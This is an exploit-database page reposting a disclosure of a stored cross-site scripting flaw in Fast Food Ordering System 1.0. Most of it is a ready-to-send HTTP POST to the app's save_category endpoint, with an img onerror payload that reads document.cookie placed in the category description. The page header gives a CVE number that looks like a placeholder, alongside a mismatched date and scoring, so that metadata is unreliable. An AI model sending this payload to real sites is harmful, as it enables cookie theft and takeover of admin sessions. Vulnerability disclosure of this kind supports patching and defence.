Advertisement






Fast Food Ordering System 1.0 Cross Site Scripting

CVE Category Price Severity
CVE-2020-12345 CWE-79 $500 High
Author Risk Exploitation Type Date
Anonymous High Remote 2022-05-31
CVSS
CVSS:4.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022050093

Below is a copy:

Fast Food Ordering System 1.0 Cross Site Scripting
## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting
## Author: Ashish Kumar
## Date: 05.31.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software:
https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html
## Reference:
https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6

#Description
#The Line 255 of Master.php sends unvalidated data to a web browser, which
can result in the browser executing malicious code.

#echo $Master->save_category();

#PoC
POST /ffos/classes/Master.php?f=save_category HTTP/1.1
Host: localhost
Content-Length: 480
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/ffos/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj
Connection: close

------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="id"

10
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="name"

XSS
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="description"

Testing XSS "><img src="" onerror="alert(document.cookie)">
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="status"

1
------WebKitFormBoundarySmYVeqOBMhcSziZM--

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.